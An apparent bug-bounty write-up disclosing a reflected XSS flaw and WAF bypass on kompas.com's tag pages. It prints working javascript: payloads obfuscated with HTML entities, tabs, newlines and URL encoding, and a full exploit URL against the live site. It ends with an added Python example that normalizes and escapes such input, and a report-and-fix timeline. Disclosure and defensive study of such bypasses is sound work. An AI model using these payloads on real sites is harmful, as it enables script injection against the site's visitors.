
REFLECTED XSS WAF BYPASS ON THE kompas.com SITE

2 min read · Jan 12, 2021

Hi, bug hunters and friends.

This time I'm going to share a reflected XSS WAF bypass on the Kompas.com site.

Let's get straight to the topic.

The XSS vulnerability is in the site's TAG feature.

https://www.kompas.com/tag/test

Payload used:

<a href="javascript:prompt()">CLICK</a>

If you submit the tag above, it gets blocked by the WAF.

[Image: Kompas.com WAF]

So here I tried to bypass the WAF using HTML entities.

The payload also has to be URL-encoded, because otherwise the warning "An Error Was Encountered" appears.

These are the characters that have to be URL-encoded to get past the "An Error Was Encountered" warning:

( ; ) = %3b

( ' ) = %27

( & ) = %26

( = ) = %3D

Final payload bypassing the WAF with HTML entities:

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">Click</a>

Final payload bypassing the WAF with HTML entities and URL encoding:

%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

Final URL:

https://www.kompas.com/tag/maia+estianty%22%3E%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

[Image: Kompas.com pop-up]
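Why the entity-encoded href gets past a literal signature, and what catches it on the defending side, as an added Python example (not code from the original post or from Kompas.com). The signature rule, the scheme allowlist and the `<input>` reflection context are assumptions; the sample values are constructed from the payloads shown above.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}   # assumption: schemes the site needs
C0_OR_SPACE = "".join(chr(c) for c in range(0x21))

# Constructed samples modelled on the two payloads in the post.
PLAIN_HREF = "javascript:prompt()"
ENTITY_HREF = ("j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;"
               "&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;")


def signature_match(raw: str) -> bool:
    """Hypothetical WAF-style rule: look for the literal scheme in the raw value."""
    return re.search(r"javascript\s*:", raw, re.I) is not None


def effective_scheme(href: str):
    """Return the scheme a browser resolves for an href attribute value."""
    url = html.unescape(href)            # attribute value: character references decoded
    url = url.strip(C0_OR_SPACE)         # URL parser: trim leading/trailing C0 control or space
    url = re.sub(r"[\t\n\r]", "", url)   # URL parser: drop ASCII tab and newline anywhere
    m = re.match(r"[A-Za-z][A-Za-z0-9+.-]*(?=:)", url)
    return m.group(0).lower() if m else None


def href_allowed(href: str) -> bool:
    """Allowlist on the normalized scheme; no scheme means a relative URL."""
    scheme = effective_scheme(href)
    return scheme is None or scheme in ALLOWED_SCHEMES


def reflect_tag(tag: str) -> str:
    """Escape the reflected value so it cannot close the attribute it lands in."""
    return '<input name="q" value="{}">'.format(html.escape(tag, quote=True))


if __name__ == "__main__":
    for h in (PLAIN_HREF, ENTITY_HREF, "https://www.kompas.com/tag/test"):
        print(signature_match(h), effective_scheme(h), href_allowed(h))
    print(reflect_tag('maia estianty"><a href="{}">CLICK'.format(ENTITY_HREF)))
```

The allowlist only matters where user-supplied links are rendered on purpose; for a reflected tag name, the output escaping in `reflect_tag` is the fix, because the value never leaves the attribute.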

Timeline :

Report : 2/1/2020

Fix : 11/1/2020

Rewards : -
